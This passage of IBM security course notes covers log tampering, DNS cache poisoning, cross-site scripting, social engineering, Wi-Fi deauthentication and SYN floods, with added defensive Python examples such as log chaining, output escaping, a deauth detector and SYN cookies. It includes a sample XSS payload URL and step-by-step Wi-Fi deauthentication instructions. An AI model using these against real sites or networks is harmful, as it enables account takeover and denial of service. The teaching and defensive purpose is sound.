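The desynchronized state of Step 2 and the ACK storm it produces, as an added Python example (this code is not from the course): a small model of two TCP endpoints that follow the RFC 793 rule of answering an out-of-sequence segment with an ACK carrying the receiver's expected sequence number. All sequence numbers, the attacker's replacement ISN and the payload are constructed for illustration, and "in sequence" is checked by exact equality rather than a receive window.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Segment:
    """Only the fields the storm depends on: sender, SEQ, ACK and any payload."""
    src: str
    seq: int
    ack: int
    data: bytes = b""


class Endpoint:
    """A minimal TCP endpoint in the ESTABLISHED state."""

    def __init__(self, name: str, snd_nxt: int, rcv_nxt: int):
        self.name = name
        self.snd_nxt = snd_nxt      # next sequence number this side will send
        self.rcv_nxt = rcv_nxt      # sequence number this side expects to receive

    def send(self, data: bytes) -> Segment:
        seg = Segment(self.name, self.snd_nxt, self.rcv_nxt, data)
        self.snd_nxt += len(data)
        return seg

    def receive(self, seg: Segment) -> Optional[Segment]:
        """RFC 793: an unacceptable segment is answered with <SEQ=SND.NXT><ACK=RCV.NXT>;
        an in-sequence pure ACK is absorbed silently. Real stacks accept anything inside
        the receive window; exact equality is enough to show the effect."""
        if seg.seq != self.rcv_nxt:
            return Segment(self.name, self.snd_nxt, self.rcv_nxt)
        self.rcv_nxt += len(seg.data)
        if seg.data:
            return Segment(self.name, self.snd_nxt, self.rcv_nxt)
        return None


def exchange(a: Endpoint, b: Endpoint, first: Segment,
             max_packets: int = 10_000, lose_packet_no: Optional[int] = None) -> int:
    """Bounce segments between a and b until one side stays silent and return the number
    of packets put on the wire. If packet number lose_packet_no is dropped, nothing
    follows it: pure ACKs carry no data and are never retransmitted."""
    receiver, other = b, a
    seg, count = first, 0
    while seg is not None and count < max_packets:
        count += 1
        if count == lose_packet_no:
            return count
        seg = receiver.receive(seg)
        receiver, other = other, receiver
    return count


def synchronized_exchange() -> int:
    # Constructed ISNs: client 999, server 4999, both advanced by one after the handshake.
    client = Endpoint("client", snd_nxt=1000, rcv_nxt=5000)
    server = Endpoint("server", snd_nxt=5000, rcv_nxt=1000)
    return exchange(client, server, client.send(b"GET / HTTP/1.0\r\n"))


def desynchronized_exchange(lose_packet_no: Optional[int] = None, max_packets: int = 10_000) -> int:
    # The client still holds the numbers of the first handshake, but the server now holds
    # those of the attacker's replacement connection (attacker ISN 6999, new server ISN 8999).
    client = Endpoint("client", snd_nxt=1000, rcv_nxt=5000)
    server = Endpoint("server", snd_nxt=9000, rcv_nxt=7000)
    return exchange(client, server, client.send(b"GET / HTTP/1.0\r\n"), max_packets, lose_packet_no)


if __name__ == "__main__":
    print("in sync:", synchronized_exchange(), "packets")            # data segment plus its ACK
    print("desynchronized:", desynchronized_exchange(), "packets")   # runs into the cap: ACK storm
    print("storm, ACK number 50 lost:", desynchronized_exchange(lose_packet_no=50), "packets")
```

The synchronized pair exchanges two packets and falls silent; the desynchronized pair bounces acknowledgements until the 10,000-packet cap, and dropping any single ACK ends the storm at that point, which is the behaviour the text describes.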

© Copyright IBM Corp. 2015 Unit 2. Data Security Threat Techniques 2-57
Course materials may not be reproduced in whole or in part
without the prior written permission of IBM.
Student Notebook

Threat Techniques (48 of 66) IBM ICE (Innovation Centre for Education)
IBM Power Systems

• Web-application Threat Techniques


– Log Tampering
• Web applications maintain logs to track the usage patterns of an application

• User logins, administrator logins, resources accessed, error conditions, and other application-
specific information are often maintained in logs

• These logs are used for proof of transactions, fulfillment of legal record retention requirements,
marketing analysis, and forensic incident analysis

• An attacker, in an attempt to cover tracks, will usually delete logs, modify logs, change user
information, and otherwise destroy all evidence of the attack

© Copyright IBM Corporation 2015

Figure 2-51. Threat Techniques (48 of 66) DS011.0

Notes:
Log Tampering
Web applications maintain logs to track the usage patterns of an application. User logins, administrator
logins, resources accessed, error conditions, and other application-specific information are often maintained
in logs. These logs are used for proof of transactions, fulfillment of legal record retention requirements,
marketing analysis, and forensic incident analysis. An attacker, in an attempt to cover tracks, will usually
delete logs, modify logs, change user information, and otherwise destroy all evidence of the attack. Because
the logs usually live on the same host the attacker has compromised, an attacker with control over them can
change the following:
20031201 11:56:54 User login: josser
20031201 12:34:07 Administrator account created: drivel
20031201 12:36:43 Administrative access: drivel
20031201 12:45:19 Configuration file accessed: drivel
To:
20031201 11:56:54 User login: josser
20031201 12:50:14 User logout: josser
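Detecting the edit shown above, as an added Python example rather than anything from the course: each log line is tagged with an HMAC over the previous tag and the line, so an attacker without the key can neither rewrite an entry nor drop the "drivel" lines without breaking the chain, and the final tag is shipped off-host so that simply truncating the log is caught too. The key, the anchor and both versions of the log are constructed for the demo.

```python
import hashlib
import hmac

# Constructed demo key. In a real deployment the key lives with the log collector or
# an HSM, never on the web server that produces the log.
KEY = b"constructed-demo-key"

ORIGINAL_LOG = [
    "20031201 11:56:54 User login: josser",
    "20031201 12:34:07 Administrator account created: drivel",
    "20031201 12:36:43 Administrative access: drivel",
    "20031201 12:45:19 Configuration file accessed: drivel",
]
REWRITTEN_LOG = [
    "20031201 11:56:54 User login: josser",
    "20031201 12:50:14 User logout: josser",
]


def chain_tags(lines, key=KEY):
    """Tag each line with HMAC(key, previous_tag || line). Every tag therefore commits
    to the whole prefix of the log, not just to its own line."""
    prev = bytes(32)
    tags = []
    for line in lines:
        prev = hmac.new(key, prev + line.encode(), hashlib.sha256).digest()
        tags.append(prev.hex())
    return tags


def first_bad_entry(lines, tags, key=KEY, anchor=None):
    """Verify a log against its tags. Returns the index of the first entry whose tag
    fails, len(lines) when every tag verifies but the last one differs from the
    externally stored anchor (the log was truncated), or -1 when all is well."""
    if len(tags) != len(lines):
        return min(len(tags), len(lines))
    for i, (got, want) in enumerate(zip(tags, chain_tags(lines, key))):
        if not hmac.compare_digest(got, want):
            return i
    if anchor is not None and (not tags or not hmac.compare_digest(tags[-1], anchor)):
        return len(lines)
    return -1


def demo():
    tags = chain_tags(ORIGINAL_LOG)
    anchor = tags[-1]        # forwarded off-host (syslog relay, WORM store) as soon as it is computed
    # Attacker rewrites the file. Without KEY no fresh tag can be computed, so the old
    # tags are left next to the edited lines.
    rewritten_tags = tags[:2]
    # Attacker only truncates: lines and tags stay consistent with each other, the anchor does not.
    truncated_log, truncated_tags = ORIGINAL_LOG[:1], tags[:1]
    return {
        "intact": first_bad_entry(ORIGINAL_LOG, tags, anchor=anchor),
        "rewritten": first_bad_entry(REWRITTEN_LOG, rewritten_tags, anchor=anchor),
        "truncated": first_bad_entry(truncated_log, truncated_tags, anchor=anchor),
    }


if __name__ == "__main__":
    for case, idx in demo().items():
        print(case + ":", "chain intact" if idx == -1 else f"tampering detected at entry {idx}")
```

The chain detects tampering after the fact; it does not prevent it. Tags have to be computed as each line is written and forwarded, together with the anchor, to a collector the web server cannot write to; otherwise an attacker who owns the host rewrites the tags along with the lines.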


Threat Techniques (49 of 66)

• Web-application Threat Techniques


– Pharming
– In this type of attack, traffic is redirected to a fake host

– DNS (the Domain Name System) is a critical part of the internet's infrastructure

– DNS publishes a hierarchical database of names, with the name servers of each zone arranged in that hierarchy

– Domain Name System Security Extension (DNSSEC) is an extension of DNS that provides three distinct
services:
> Key distribution

> Data origin authentication

> Transaction and request authentication


Figure 2-52. Threat Techniques (49 of 66) DS011.0

Notes:
Pharming
In this type of attack, traffic is redirected to a fake host. Of the different methods, DNS cache poisoning is
the most common pharming attack. DNS (the Domain Name System) is a critical part of the internet's
infrastructure: it publishes a hierarchical database of names, with the name servers of each zone arranged
in that hierarchy. DNS is designed as a distributed system. To improve performance, clients contact local
DNS resolvers, usually maintained by local ISPs, which query the name servers and cache the records they
receive. Clients, resolvers and name servers all talk to one another over UDP port 53. Internet security relies
heavily on DNS: e-mail authentication mechanisms such as DKIM, SPF and SenderID depend on it, so if DNS
is compromised these signature-based countermeasures can be made to accept spoofed e-mail. If DNS can
be made to answer with the address of the phisher's server, web spoofing follows with ease. In DNS cache
poisoning, the local resolver's cache is fed incorrect records. Because DNS runs over UDP, the source
address of a packet is easily spoofed, and the DNS packet header carries only a 16-bit query ID. That field
is so short that an attacker who fires off many forged responses has a good chance of matching an
outstanding query, which is a birthday attack.


Domain Name System Security Extensions (DNSSEC) extend DNS to provide three distinct services: key
distribution, data origin authentication, and transaction and request authentication. Every DNS record in a
signed zone can be authenticated through a chain of trust. Cache poisoning of such records fails because
the phisher cannot produce a correct signature without the zone's private key; note that this protects only
zones that are signed and resolvers that validate the signatures. However, DNSSEC is not yet widely
deployed.
Google Public DNS, the largest public DNS resolver in the world, mitigates cache poisoning by adding
entropy to its queries in the following ways:
- Using a random UDP source port for each query
- Choosing at random among the configured name servers of a zone
- Randomizing the case of the query name: for example, wWw.eXaMpLe.CoM and WwW.ExamPLe.COm are
equivalent to the authoritative server, but the response must echo the exact case that was sent
- Adding a nonce label to the query name when the response is known to be a referral, for example sending
entriih-f10r3.www.google.com in a query to the root servers
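The arithmetic behind the 16-bit query ID and the resolver-side mitigations above, as an added Python example (not course material): the spoof-success probability for a given amount of entropy, a DNS 0x20 case randomizer, and the acceptance check a resolver applies to an answer. The query and forged-response counts in the 300 x 300 scenario are constructed, and the 16 bits credited to the source port are an upper bound, since real ephemeral port ranges are narrower.

```python
import math
import secrets


def spoof_success_probability(forged_responses: int, entropy_bits: int,
                              outstanding_queries: int = 1) -> float:
    """Chance that at least one forged response matches one of the resolver's outstanding
    queries. With many queries in flight at once this takes the birthday form:
    P = 1 - exp(-queries * forgeries / 2^bits)."""
    space = 2.0 ** entropy_bits
    return 1.0 - math.exp(-forged_responses * outstanding_queries / space)


def randomize_case(qname: str) -> str:
    """DNS 0x20 encoding: flip the case of each letter at random. Authoritative servers
    treat names case-insensitively but copy the question section back verbatim, so the
    mix of cases becomes extra entropy a blind spoofer has to guess."""
    return "".join(ch.upper() if ch.isalpha() and secrets.randbits(1) else ch.lower() for ch in qname)


def entropy_bits(qname: str, random_source_port: bool = True, use_0x20: bool = True) -> int:
    """Bits a blind attacker must guess: the 16-bit transaction ID, up to 16 bits of UDP
    source port, and one bit per letter of the name when 0x20 is in use."""
    bits = 16
    if random_source_port:
        bits += 16
    if use_0x20:
        bits += sum(ch.isalpha() for ch in qname)
    return bits


def make_query(qname: str) -> dict:
    return {"txid": secrets.randbits(16),
            "port": 1024 + secrets.randbelow(64512),
            "qname": randomize_case(qname)}


def response_is_acceptable(query: dict, response: dict) -> bool:
    """The resolver's check: ID, port and the exact, case-sensitive name must all match."""
    return (query["txid"] == response["txid"]
            and query["port"] == response["port"]
            and query["qname"] == response["qname"])


if __name__ == "__main__":
    scenarios = (("txid only", 16),
                 ("txid + source port", 32),
                 ("txid + port + 0x20", entropy_bits("www.example.com")))
    for label, bits in scenarios:
        p = spoof_success_probability(forged_responses=300, entropy_bits=bits, outstanding_queries=300)
        print(f"{label:20s} {bits:2d} bits  P(success), 300 queries x 300 forgeries: {p:.2e}")
    q = make_query("www.example.com")
    # Attacker that guessed the ID and port but echoes the name in lower case.
    forged = {"txid": q["txid"], "port": q["port"], "qname": "www.example.com"}
    print("query name sent:", q["qname"], "- forged answer accepted:", response_is_acceptable(q, forged))
```

With the ID alone, 300 in-flight queries and 300 forged answers already give the attacker better than a 70% chance; adding a random source port pushes the same effort to roughly one in fifty thousand, and 0x20 adds a bit per letter on top.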


Threat Techniques (50 of 66)

• Web-application Threat Techniques


– Cross-site Scripting (XSS)
• Cross-site scripting is also called XSS; it is distinct from cross-site request forgery (CSRF)

• The attack is possible when a web application places user-supplied input into its pages without
validating or encoding it

• Once exploited, the web application does things in the user's browser that are otherwise not allowed

• The injected input can be propagated to other users as well


Figure 2-53. Threat Techniques (50 of 66) DS011.0

Notes:
Cross-site Scripting (XSS)
Cross-site scripting is also called XSS (it is distinct from cross-site request forgery, CSRF, which is a
separate attack). The vulnerability arises when a web application takes input from a user and sends it back
to end users as part of a page, so that an attacker can use the application to deliver malicious JavaScript to
other users' browsers. The attack is carried out through that input, which can be propagated to other users
as well. The attacker exploits a web application that the end user trusts completely, and once exploited the
application does things in the user's browser that are otherwise not allowed. Attackers often encode the
malicious part of the injected tag in different ways so that the request looks genuine to the user. XSS
attacks fall into two categories: stored and reflected. In stored attacks the injected code is stored
permanently on the target server, in a database, message forum, visitor log or similar. In reflected attacks
the injected code takes another route to the victim, such as an e-mail message or a different server: when
the user is tricked into clicking a link or submitting a form, the code is sent to the vulnerable web server,
which reflects it back to the user's browser, and the browser executes it because it came from a trusted
server. XSS attacks cause different kinds of problems for the end user and ultimately result in a compromised
account. The most dangerous attacks involve stealing the user's session cookies, which lets the attacker
hijack the session and take over the account. Other attacks involve exposing end-user files, installing
Trojan horse programs, redirecting users to other pages, and modifying the presentation of content.


For example: a company Z runs a website on which users track the stocks in their own portfolios. When a
user logs in to the company's website he is redirected to:
http://www.companyz.com/default.asp?name=RaghavAshima
A server-side script then generates a page welcoming the user, which states:
"Welcome back, RaghavAshima!"
The stocks in the user's portfolio are stored in a database, and the website places a cookie on the user's
computer containing a key for that site; the cookie is retrieved from the user's system whenever the site is
visited. An attacker learns that this website suffers from a reflected XSS vulnerability and decides to exploit
it to obtain confidential information about the site's users. The attacker sends the user an e-mail claiming
that he has won a lottery of 25 thousand dollars, with a link where he can collect the money. The URL sent
looks like this:
http://www.companyz.com/default.asp?name=<script>evilScript()</script>
The user falls for it, clicks the link and logs in with his name and password. The web server generates the
HTML and sends it to the user's browser, which interprets and runs the received script without any
prompting. The account is compromised at once if the script instructs the browser to send the attacker the
cookie that gives access to the user's portfolio. The diagram below illustrates these concepts.
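The welcome page from the example above, as an added Python example (not the course's code and not company Z's): the vulnerable rendering next to a hardened one, plus the cookie attribute that limits the damage if a script does get to run. TEMPLATE, the two URLs and the session cookie value are constructed, and since default.asp itself is not shown on the page, its parameter handling is an assumption.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# The welcome page from the example, reduced to the line that matters.
TEMPLATE = "<html><body><h1>Welcome back, {name}!</h1></body></html>"
BENIGN_URL = "http://www.companyz.com/default.asp?name=RaghavAshima"
PAYLOAD_URL = "http://www.companyz.com/default.asp?name=<script>evilScript()</script>"


def name_from_url(url: str) -> str:
    """Pull the 'name' query parameter the way default.asp presumably does (first value, or empty)."""
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflects the parameter verbatim into the HTML: this is the bug in the example."""
    return TEMPLATE.format(name=name_from_url(url))


def render_hardened(url: str) -> str:
    """HTML-encodes the value before it is placed in element content. quote=True also
    encodes quotes, so the same call is safe inside a double-quoted attribute."""
    return TEMPLATE.format(name=escape(name_from_url(url), quote=True))


def contains_script_tag(html: str) -> bool:
    return "<script" in html.lower()


def session_cookie_header(value: str) -> str:
    """Defence in depth for the cookie-theft scenario: HttpOnly hides the cookie from
    document.cookie even if a script does run; Secure keeps it off plaintext HTTP."""
    return f"Set-Cookie: session={value}; Secure; HttpOnly; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD_URL))   # the <script> tag survives: the browser would run evilScript()
    print(render_hardened(PAYLOAD_URL))     # &lt;script&gt;...: shown as text, never executed
    print(render_hardened(BENIGN_URL))
    print(session_cookie_header("example-session-id"))
```

escape() is the right tool for text placed in element content or a quoted attribute; a value that lands inside a script block, a URL or a CSS property needs the encoder for that context, and validating the name against an allow-list before rendering narrows the problem further.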


Web-application Threat Techniques (51 of 66)


Figure 2-54. Web-application Threat Techniques (51 of 66) DS011.0

Notes:
This figure illustrates the steps involved in cross-site scripting technique.


Threat Techniques (52 of 66)

• Web-application Threat Techniques


– Cross-site Scripting (XSS)
• Step 1: The user clicks the link sent by the attacker

• Step 2: The request reaches the website, which has a cross-site scripting bug

• Step 3: The website sends the malicious script back to the user's web browser

• Step 4: The user's browser executes the malicious code

• Step 5: The sensitive data is sent to the attacker's computer


Figure 2-55. Threat Techniques (52 of 66) DS011.0

Notes:
This slide lists the step-by-step methodology of cross-site scripting in detail. The process is illustrated
diagrammatically in the previous slide.


Threat Techniques (53 of 66)

• Physical Security
– CCTV cameras, locks, guards and alarms are the common controls involved in physical security

– While these countermeasures are important in securing an information system physically, they are not
the only protections that must be considered

– Physical security is the protection of hardware, personnel, programs, data and networks from physical
events, including natural disasters, fire, burglary, terrorism and theft


Figure 2-56. Threat Techniques (53 of 66) DS011.0

Notes:
Physical Security
Most people think of CCTV cameras, locks, guards and alarms when they consider physical security. While
these countermeasures are important in securing an information system physically, they are not the only
protections that must be considered. All countermeasures that are physical in nature fall into the physical
security category. Physical security is the protection of hardware, personnel, programs, data and networks
from physical events, including natural disasters, fire, burglary, terrorism and theft, through countermeasures
such as suitable emergency preparedness, solid building construction, adequate climate control and reliable
power supplies.
The importance of physical security is often undervalued because Trojans, spyware and hacking are seen as
more dramatic and technical issues. But without physical security the various software security controls
become null and void, since an intruder needs only a limited amount of technical knowledge to carry out a
physical breach. The threat techniques that can be used to breach physical security follow.


Threat Techniques (54 of 66)

• Physical security
– Dumpster diving
• Looking for information in someone else's trash

• An attacker can dive into an organization's dumpster to retrieve information such as a calendar, a
phone list or an organization chart

• All media leaving the organization must be erased, and all employees must be educated about disposal


Figure 2-57. Threat Techniques (54 of 66) DS011.0

Notes:
Dumpster Diving
Looking for information in someone else's trash is known as dumpster diving. It is a technique used to obtain
information from another person's garbage, and that information can be used to carry out attacks on a
computer network that can be devastating. Dumpster diving is not limited to searching the trash for
passwords or access codes: to gain access to a network, an attacker can dive into an organization's
dumpster to retrieve information such as a calendar, a phone list or an organization chart. Every organization
must establish a disposal policy so that dumpster divers cannot learn anything from its trash: all paper used
by employees must be shredded before it is recycled, all storage media must be erased before disposal, and
all employees must be educated about the policy.


Web-application Threat Techniques (55 of 66)

• Physical Security
– Social Engineering
• This method relies heavily on interaction with the company's employees

• It involves tricking people into breaking security procedures that would otherwise be effective

• Social engineers also rely on the natural helpfulness and weaknesses of employees

• For example: a social engineer calls an authorized employee claiming that an urgent problem requires
immediate access to the network


Figure 2-58. Web-application Threat Techniques (55 of 66) DS011.0

Notes:
Social engineering
This method relies heavily on interaction with the company's employees. It is a non-technical but very
effective way of hacking and extracting information. It involves tricking people into breaking security
procedures that would otherwise be effective. A social engineer runs a con game to get information out of
an employee of an organization. For example, a social engineer tries to gain the confidence of a user who is
authorized to access the computer network; once that employee trusts the social engineer, the network can
be breached easily. Social engineers also rely on the natural helpfulness and weaknesses of employees. For
example, a social engineer calls an authorized employee claiming that an urgent problem requires immediate
access to the network. Appeals to vanity, authority or greed, and old-fashioned eavesdropping, are other
social engineering techniques. Some other types of social engineering follow.


Web-application Threat Techniques (56 of 66)

• Physical Security
– Social Engineering
• Baiting

• Phishing

• Pre-texting

• Spear phishing

• Tailgating


Figure 2-59. Web-application Threat Techniques (56 of 66) DS011.0

Notes:
Baiting: Baiting is when an attacker leaves a physical device infected with malware in a place where it is
sure to be found and inserted into a system. The malware is then installed unintentionally when the user
picks up the device and inserts it.
Phishing: Phishing is when a malicious party sends a fraudulent e-mail disguised as a genuine one, often
purporting to come from a trusted source. The message tricks the recipient into installing malware on the
system or into sharing the employee's financial or personal information.
Pre-texting: Pre-texting is when one party lies to another in order to gain access to confidential data. For
example, an attacker running a pre-texting scam pretends to need some financial or personal information in
order to confirm the recipient's identity.
Spear phishing: This attack is similar to phishing, the only difference being that it is tailored to a specific
organization or individual. The attacker seeks specific information in order to obtain trade secrets or other
data related to the organization's finances.
Tailgating: Tailgating is when an unauthorized party follows an authorized party into a location that is
otherwise secure. It is done to steal valuable information from an organization, and often involves subverting
the keycard access control that protects the area.


Threat Techniques (57 of 66)

• Wireless Network Threat Techniques


– Wireless networking provides many advantages, but it also comes with new security threats

– Although implementing technological solutions is the usual response to wireless security threats and
vulnerabilities, wireless security is primarily a management issue

– Some of the wireless network threat techniques are described in the slides that follow


Figure 2-60. Threat Techniques (57 of 66) DS011.0

Notes:
Wireless Network Threat Techniques
Wireless networking provides many advantages, but it also comes with new security threats and alters the
organization's overall information security risk profile. Although implementing technological solutions is the
usual response to wireless security threats and vulnerabilities, wireless security is primarily a management
issue. Some of the wireless network threat techniques by which data on the network can be breached are
described in the slides that follow.


Threat Techniques (58 of 66)

• Wireless Network Threat Techniques


– Wi-Fi Hacking
• A wireless access point can be attacked only from within range of the network

• Most access points reach about 300 feet (100 metres)


Figure 2-61. Threat Techniques (58 of 66) DS011.0

Notes:
Wi-Fi Hacking
A wireless access point can be attacked only from within range of the network. Most access points reach
about 300 feet (100 metres), so the attacker does not have to be very close. The next slide shows a
diagrammatic illustration of the steps involved in Wi-Fi hacking.


Wireless Network Threat Techniques (59 of 66)


Figure 2-62. Wireless Network Threat Techniques (59 of 66) DS011.0

Notes:
The figure illustrates the steps involved in Wi-Fi hacking techniques. These steps have been discussed in
more detail in the slides which follow.


Threat Technique (60 of 66)

• Wireless Network Threat Techniques


– Wi-Fi Hacking
• Step 1: Open a terminal

• Step 2: Put the wireless adapter in monitor mode

• Step 3: Monitor the available APs with airodump-ng

• Step 4: Connect to the access point

• Step 5: Broadcast de-authentication frames to the users on the AP


Figure 2-63. Threat Technique (60 of 66) DS011.0

Notes:
Step 1: Open a Terminal: Once the intruder is within range of the Wi-Fi access point, the intruder boots
BackTrack and opens a terminal.
Step 2: Put the Wireless Adapter in Monitor Mode: The next step is to put the wireless adapter into monitor
mode with the airmon-ng tool.
Step 3: Monitor the Available APs with airodump-ng: Using airodump-ng, all the access points in range are
listed.
Step 4: Connect to the Access Point: The attacker's computer is now associated with the access point. The
BSSID of the access point is shown at the bottom left of the airodump-ng output, and the MAC address of a
connected client is visible as well. Both are needed for the next step of the attack.
Step 5: Broadcast De-authenticate Users on the AP: The next step is to bump off, or de-authenticate, all the
users of the access point. Thousands of de-authentication frames are sent to the access point so that the
employees cannot reconnect to it. The command used to send them takes the following parameters:
For example: if 00:09:5B:6F:64:1E is the BSSID of the AP and 44:6D:57:C8:58:A0 is the MAC address of our
computer, then 1000 is the number of de-authentication frames sent to the AP.
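The de-authentication flood of Step 5 seen from the defender's side, as an added Python example (not part of the course): a sliding-window detector over a constructed capture of 802.11 management frames that raises an alert when one BSSID emits more deauth frames in ten seconds than a normal network would. The BSSID and client MAC are the ones quoted in the step above; the timestamps, the threshold and the window are constructed.

```python
from collections import defaultdict, deque

# 802.11 frame control: type 0 = management; subtype 8 = beacon, subtype 12 = deauthentication.
BEACON = (0, 8)
DEAUTH = (0, 12)
AP = "00:09:5b:6f:64:1e"          # BSSID used in the course example above
CLIENT = "44:6d:57:c8:58:a0"      # MAC address from the same example
BCAST = "ff:ff:ff:ff:ff:ff"

# Constructed capture: (timestamp in seconds, type, subtype, bssid, destination).
FRAMES = (
    [(float(t), *BEACON, AP, BCAST) for t in range(60)]                 # one beacon per second
    + [(5.0, *DEAUTH, AP, CLIENT), (41.0, *DEAUTH, AP, CLIENT)]        # two ordinary deauths
    + [(30.0 + i * 0.05, *DEAUTH, AP, BCAST) for i in range(30)]        # flood: 30 broadcast deauths in 1.5 s
)


def detect_deauth_floods(frames, threshold: int = 20, window: float = 10.0) -> dict:
    """Sliding-window count of deauthentication frames per BSSID. Returns {bssid: info}
    for every BSSID that reached `threshold` frames within `window` seconds; one alert per
    BSSID, raised on the frame that crosses the threshold."""
    recent = defaultdict(deque)     # bssid -> timestamps of deauth frames still inside the window
    alerts = {}
    for ts, ftype, subtype, bssid, dst in sorted(frames):
        if (ftype, subtype) != DEAUTH:
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and bssid not in alerts:
            alerts[bssid] = {"first_seen": q[0], "count": len(q), "broadcast": dst == BCAST}
    return alerts


if __name__ == "__main__":
    for bssid, info in detect_deauth_floods(FRAMES).items():
        print(f"deauth flood from {bssid}: {info['count']} frames from t={info['first_seen']}s,"
              f" broadcast={info['broadcast']}")
```

A few deauth frames per minute are normal (stations roaming, an AP shedding idle clients); a burst of dozens addressed to the broadcast address is the signature of a tool-driven attack. Detection does not stop it. Management frame protection (802.11w), where the AP and clients support it, does, because deauth frames are then authenticated and forged ones are ignored.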


Threat Techniques (61 of 66)

• Wireless Network Threat Techniques


– DoS Attack
• In a typical connection the user sends a message asking the server to authenticate the request

• Only when the user receives the server's approval is he allowed to access the server

• In the attack the server tries to send its approval but cannot, because all the requests carry false
return addresses

• DoS and DDoS attacks have been posing problems for some time now

• These attacks succeed in many cases because organizations do not update their incident response
plans or tune their threat-mitigation technologies


Figure 2-64. Threat Techniques (61 of 66) DS011.0

Notes:
DoS Attack
In a typical connection the user sends a message asking the server to authenticate the request. The server
returns its approval to the user, and only when the user receives it is he allowed to access the server. In a
Denial of Service (DoS) attack, the attacker sends the server so many such requests that it fills up. When
the server tries to send its approval for each request it cannot, because all the requests carry false return
addresses, so it holds each half-open request and closes it only after waiting a minute or more (this is the
classic TCP SYN flood). The attacker then sends a new batch of forged requests, and the server's attempt
to grant access begins again. DoS and DDoS attacks have been posing problems for some time now. These
attacks succeed in many cases because organizations do not update their incident response plans or tune
their threat-mitigation technologies. Traffic-flooding and high-volume techniques are the ones primarily
used against service providers. A malicious actor may also use a DoS attack as cover while going after
critical information in an e-commerce organization's database.
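The half-open requests described above and a stateless defence against them, as an added Python example that is not from the course: a naive listener that stores state for every request and runs out of room under a flood of forged-source SYNs, next to a SYN-cookie listener that folds the handshake into the server's initial sequence number and needs no table at all. The addresses, the secret, the backlog size and the cookie layout are constructed; the layout is a simplification of the Linux scheme, which also packs the client's MSS into the value.

```python
import hashlib
import hmac

SECRET = b"constructed-demo-secret"   # a real host draws this at random at boot
BACKLOG = 128                          # half-open connections the naive listener can hold
HALF_OPEN_TIMEOUT = 75.0               # seconds before an unanswered SYN/ACK is given up on


class NaiveListener:
    """Allocates state for every SYN. Spoofed SYNs are never completed, so they sit in
    the backlog until they time out, and legitimate clients are turned away meanwhile."""

    def __init__(self):
        self.half_open = {}

    def on_syn(self, src, sport, client_isn, now):
        self.half_open = {k: t for k, t in self.half_open.items() if now - t < HALF_OPEN_TIMEOUT}
        if len(self.half_open) >= BACKLOG:
            return None                       # backlog exhausted: the SYN is dropped
        self.half_open[(src, sport)] = now
        return 1000                           # server ISN (fixed here for illustration)

    def on_ack(self, src, sport, seq, ack, now):
        return self.half_open.pop((src, sport), None) is not None


def syn_cookie(src, sport, client_isn, counter):
    """Server ISN that encodes the handshake: 5 bits of coarse time (so cookies expire)
    and 27 bits of keyed MAC over the connection tuple."""
    msg = f"{src}:{sport}:{client_isn}:{counter}".encode()
    mac = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return ((counter & 0x1F) << 27) | (int.from_bytes(mac[:4], "big") & 0x07FFFFFF)


class SynCookieListener:
    """Keeps no per-SYN state; the final ACK itself proves the client saw the SYN/ACK."""

    def on_syn(self, src, sport, client_isn, now):
        return syn_cookie(src, sport, client_isn, int(now) // 64)

    def on_ack(self, src, sport, seq, ack, now):
        client_isn, counter = seq - 1, int(now) // 64       # the ACK's seq is client_isn + 1
        return any(ack - 1 == syn_cookie(src, sport, client_isn, c) for c in (counter, counter - 1))


def simulate(flood_size: int = 10_000) -> dict:
    now = 1_700_000_000.0
    naive, cookie = NaiveListener(), SynCookieListener()
    # Flood: SYNs from forged source addresses (constructed). The SYN/ACKs go nowhere,
    # so no ACK ever follows and the naive backlog never drains.
    for i in range(flood_size):
        forged_src, forged_port = f"198.51.100.{i % 254 + 1}", 40_000 + i % 20_000
        naive.on_syn(forged_src, forged_port, i, now)
        cookie.on_syn(forged_src, forged_port, i, now)
    # A legitimate client (constructed address) arrives in the middle of the flood.
    src, sport, client_isn = "203.0.113.7", 51_515, 424_242
    naive_isn = naive.on_syn(src, sport, client_isn, now + 1)
    cookie_isn = cookie.on_syn(src, sport, client_isn, now + 1)
    result = {
        "naive_half_open": len(naive.half_open),
        "naive_accepted_legit_syn": naive_isn is not None,
        "cookie_accepted_legit_syn": cookie_isn is not None,
    }
    # The client's ACK carries seq = client_isn + 1 and ack = server_isn + 1.
    result["cookie_handshake_ok"] = cookie.on_ack(src, sport, client_isn + 1, cookie_isn + 1, now + 2)
    # An attacker who never saw the SYN/ACK has to guess the cookie.
    result["guessed_ack_ok"] = cookie.on_ack(src, sport, client_isn + 1, 12_345, now + 2)
    return result


if __name__ == "__main__":
    for key, value in simulate().items():
        print(f"{key}: {value}")
```

SYN cookies have a cost: because the server remembers nothing about the SYN, options negotiated in it (window scaling, SACK) are lost unless they are squeezed into the cookie, which is why production stacks switch cookies on only once the backlog is actually overflowing.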


Wireless Network Threat Techniques (62 of 66)

• Wireless Network Threat Techniques


– DoS Attack
• Step 1: Users are directed

• Step 2: Compromising the systems

• Step 3: DoS or DDoS attack are launched

• Step 4: Crashing of systems


Figure 2-65. Wireless Network Threat Techniques (62 of 66) DS011.0

Notes:
DoS Attack
Step 1: Unsuspecting users are directed by a malicious hyperlink or a phishing e-mail to a website where their
systems are infected with malware and placed under the control of the attacker, who can then use them for
malicious activities
Step 2: Without the users' knowledge, the compromised machines wait for instructions from the bot controller
to attack a target. These bots may remain idle for many days before they are activated
Step 3: At the command of the bot controller, the compromised machines launch DoS or DDoS attacks
against the target
Step 4: The targeted systems are overrun with traffic and forced offline


Threat Techniques (63 of 66)

• Bluetooth Device Threat Techniques


– The use of wireless communication systems and their interconnection via networks has grown

– RF communication is easier to use than wired or infrared communication, but it also makes
eavesdropping easier

– Because wireless RF communication is exposed to these threats, additional countermeasures are needed
to protect against them


Figure 2-66. Threat Techniques (63 of 66) DS011.0

Notes:
Bluetooth Device Threat Technique
The use of wireless communication systems and their interconnections via networks have grown rapidly in
recent years. Because RF (Radio Frequency) waves can penetrate obstacles, wireless devices can
communicate with no direct line-of-sight between them. This makes RF communication easier to use than
wired or infrared communication, but it also makes eavesdropping easier. Moreover, it is easier to disrupt and
